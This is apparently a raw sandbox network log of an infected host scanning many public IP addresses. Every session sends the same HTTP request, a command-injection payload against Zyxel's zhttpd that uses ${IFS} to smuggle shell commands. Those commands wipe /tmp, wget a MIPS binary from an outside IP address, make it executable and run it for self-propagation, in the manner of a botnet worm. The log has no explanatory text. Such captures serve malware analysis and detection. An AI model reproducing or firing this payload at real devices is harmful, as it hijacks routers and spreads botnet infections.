                                                        Jan 28, 2024 10:12:47.307892084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3045192.168.2.1456280107.65.4.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307940006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3046192.168.2.1441330167.106.14.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.307974100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3047192.168.2.144448278.43.200.226443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308024883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3048192.168.2.143996238.248.126.0443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308056116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3049192.168.2.143754441.255.111.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308090925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3050192.168.2.143643680.214.35.253443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308141947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3051192.168.2.1450274193.0.112.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308163881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3052192.168.2.1459210188.131.168.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308213949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3053192.168.2.144863651.28.36.210443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308237076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3054192.168.2.1439982186.135.85.106443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308294058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3055192.168.2.145504642.66.230.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308336973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3056192.168.2.14444729.107.9.129443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308358908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3057192.168.2.1435318181.120.101.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308396101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3058192.168.2.14335642.153.91.103443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308434010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3059192.168.2.143337824.219.212.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308476925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3060192.168.2.1448840176.8.101.155443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308537960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3061192.168.2.144927078.178.36.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308589935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3062192.168.2.1441258128.245.216.76443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308619976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3063192.168.2.144415227.251.25.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308667898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3064192.168.2.1436586198.130.160.62443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308706999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3065192.168.2.1438622222.212.89.150443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308732986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3066192.168.2.145081053.29.22.128443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308770895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3067192.168.2.1445712129.80.2.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308795929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3068192.168.2.145939439.79.68.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308845043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3069192.168.2.143905674.121.89.68443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308881998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3070192.168.2.144685818.171.26.187443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308937073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3071192.168.2.144898634.200.230.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308981895 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3072192.168.2.143486877.210.59.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.308999062 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3073192.168.2.1434418112.98.147.185443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309041977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3074192.168.2.1448662148.239.170.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309092999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3075192.168.2.144280886.106.34.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309137106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3076192.168.2.1450988211.219.239.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309174061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3077192.168.2.1434510117.96.102.183443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309215069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3078192.168.2.143501447.160.14.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309235096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3079192.168.2.1446912147.104.131.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309271097 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3080192.168.2.1450904119.50.50.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309328079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3081192.168.2.1444180192.243.157.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309366941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3082192.168.2.1435068221.248.85.246443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309401035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3083192.168.2.1454316208.127.122.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309449911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3084192.168.2.144350666.225.198.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309489965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3085192.168.2.143682086.88.237.111443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309540033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3086192.168.2.1433618138.189.14.43443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309571981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3087192.168.2.1451426134.171.245.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309603930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3088192.168.2.14583602.127.52.180443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309632063 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3089192.168.2.1441128184.11.237.157443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309674978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3090192.168.2.1442836211.1.169.75443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309717894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3091192.168.2.1459648147.0.232.231443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309761047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3092192.168.2.14576229.154.125.145443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309794903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3093192.168.2.1441250119.120.65.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309850931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3094192.168.2.145580670.113.25.123443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309871912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3095192.168.2.1452808167.163.19.133443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309917927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3096192.168.2.1436320129.10.113.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309957981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3097192.168.2.1453484194.59.67.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.309989929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3098192.168.2.145942025.217.59.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310030937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3099192.168.2.1448376105.67.133.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310074091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3100192.168.2.143504459.165.217.85443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310111046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3101192.168.2.1433238221.120.148.179443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310302973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3102192.168.2.14567261.33.213.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310352087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3103192.168.2.145444080.204.227.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310354948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3104192.168.2.1456670169.250.71.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:47.310398102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3105192.168.2.144972688.170.35.141443
                                                        TimestampBytes transferredDirectionData
